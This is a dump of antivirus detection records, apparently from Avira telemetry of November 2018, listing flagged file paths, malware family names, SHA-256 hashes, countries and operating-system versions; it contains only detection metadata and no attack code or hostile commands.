  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T15:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T13:30:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050806-410252d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050806-410252D2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054418-4fbdbe06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054418-4FBDBE06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:44:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050933-74be1ce8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050933-74BE1CE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054155-fa21020a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054155-FA21020A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051410-19cfe268', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051410-19CFE268', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061901-295ad5ca', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061901-295AD5CA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062109-75544ba5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062109-75544BA5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060612-5e840e9a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060612-5E840E9A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053450-fcb8d991', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053450-FCB8D991', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062241-ac447b87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062241-AC447B87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051916-d090acbc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051916-D090ACBC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055717-1fb4432c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055717-1FB4432C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053328-cc260ced', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053328-CC260CED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051923-d46c39c6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051923-D46C39C6', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:19:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053335-d00044f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053335-D00044F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:32:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160010-ebf8b08b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160010-EBF8B08B', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='coc traumacenter.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO COC TRAUMACENTER\\COC TRAUMACENTER.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pertama.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\LPA\\MATERI TRAINING\\PERTOLONGAN PERTAMA\\PERTAMA.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='delnesec.exe', filepath='C:\\Temp\\DelNESEC.exe', filesize=896000, name='TR/Muldrop.phzie.#M1.#R1'), hash='18c3b3e51d6d955dba0de350125894462d0e2a9518358e9ee6d45e6ce8c419c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\A3000\\ExtInstall\\HEAT_uninstall.exe', parentsize=1947648, timestamp='2018-11-01T17:18:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:27:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T14:08:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:43:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154626-61233a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154626-61233A62', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:46:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155921-e39f4aa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155921-E39F4AA3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-102807-b6b24d03', filepath='C:\\Dokumente und Einstellungen\\All Users\\Anwendungsdaten\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-102733-4A2C50FE\\AVSCAN-20181101-102807-B6B24D03', filesize=256000, name='TR/Agent.256000.C.#M1.#R1'), hash='185c137566c02057db28f1eef903b17754be7f63a38d74984dae684e62bf79c0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:28:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='234902741324690.acv', filepath='D:\\Sagar__\\Trojan.Win32.Fareit.gi\\234902741324690.acv', filesize=192000, name='TR/AD.Fareit.Y.#M1.#R1'), hash='1b2ca8ba39cc650a806f78ce129d98467ab7823b2201d8272be48beb3d5c4849', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:24:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152530-420beae7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-152056-1BEC4832\\AVSCAN-20181101-152530-420BEAE7', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:44:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155713-ce06b454', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155713-CE06B454', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered darom', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered darom', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='4b541787c8033f59b44a25777f2a2f4a3037447f688288976f253ea07a26f3e8', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:11:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered codas', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered codas', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='1e054b0e49b4ec2b7fda968c1089d240a94880ed8917dda7b7e0285db40634b9', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T19:55:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='logreader.exe', filepath='E:\\UFIandroid\\Advan\\!Driver & Tools\\Driver Qualcomm\\Qualcomm Driver\\QRD_USB_Drivers\\QCUSBNetworkCombo\\Qualcomm\\1072QRD\\logReader.exe', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='1a4418c9acc85235bcefb6826575a5e8fa2cca25fe7775cbfbfdc83b6ca7e312', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3662232, timestamp='2018-11-01T13:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160203-fee9ce32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160203-FEE9CE32', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ev~nen^e.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\Ev~NeN^e.eXe', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp2266368\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline='\\\\\\/RSF \\\\\\/ppn:T3RNZyFaKB9EbHY2 \\\\\\/mnl', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Programs\\Adobe Premiere Pro CC 2018 12.1.1.10 Full Version_2009304831.exe', parentsize=2409021, timestamp='2018-11-01T14:48:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='天龙小蜜[0920.1].exe', filepath='C:\\Users\\X\\Documents\\我的YY\\977504962\\新建文件夹\\天龙小蜜[0920.1].exe', filesize=13824000, name='HEUR/AGEN.1035113.#M1.#R1'), hash='3e1ec31401bc1d02c0caf1c6955de4aed1e29063c27410aa9a2082ccd09befc3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe375_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe375 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='CN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T10:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155647-c9a55cc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155647-C9A55CC5', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:56:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235715-65293044', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-235655-622049BD\\AVSCAN-20181101-235715-65293044', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:58:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='killpot.exe', filepath='C:\\Program Files\\DAUM\\PotPlayer\\KillPot.exe', filesize=152000, name='W32/Sality.AT.#M1.#R1'), hash='b880009f4d3da3600ba1b66a45d22e4805378880c47337883e806f7e97c17691', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T19:15:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='backupmanager.exe', filepath='C:\\Program Files (x86)\\NTI\\Acer Backup Manager\\BackupManager.exe', filesize=5288000, name='W32/Sality.AT.#M1.#R1'), hash='c3880e02ea3d2d464b221e69dd1431daad5513214e228725813912d17eba3f70', metadata=Row(cmdline='--engine=2 --session-id=LjLpfFqDOl9RiWNdEnOthLOHWLrI\\\\\\/uzBqEdVKMsy --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='TR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\34.176.200\\software_reporter_tool.exe', parentsize=13581432, timestamp='2018-11-01T08:58:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235756-404111ac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_84010185\\AVSCAN-20181101-235651-3719DF95\\AVSCAN-20181101-235756-404111AC', filesize=1544000, name='PUA/InstallCore.Gen2.#M1.#R1'), hash='6e1d6a7d3eafeb79153563f2bafd04e686bbd578a0a1548d4b1a5a45276d1525', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:57:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\D3A83824DDD62393CEA8F2B51208D43938DD426E6D4BA6B47C516821EE0FE21A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d3a83824ddd62393cea8f2b51208d43938dd426e6d4ba6b47c516821ee0fe21a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:10:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.google.android.gms.exe', filepath='G:\\Android\\data\\com.google.android.gms.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123255-250f0bb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1662c744\\AVSCAN-20181101-123242-23885628\\AVSCAN-20181101-123255-250F0BB9', filesize=1664000, name='HEUR/APC.#M1.#R1'), hash='7650bfb391ff1d9c4862b921cb0d606381200e89b5587479f3b1187c068860e2', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T10:32:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110301-be5ea961', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110301-BE5EA961', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:02:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:01:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='devoir - copie.exe', filepath='G:\\bluetooth\\DEVOIR - Copie.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:53:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Internet Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:11:03Z'), dt=datetime.date(2018, 11, 1)),
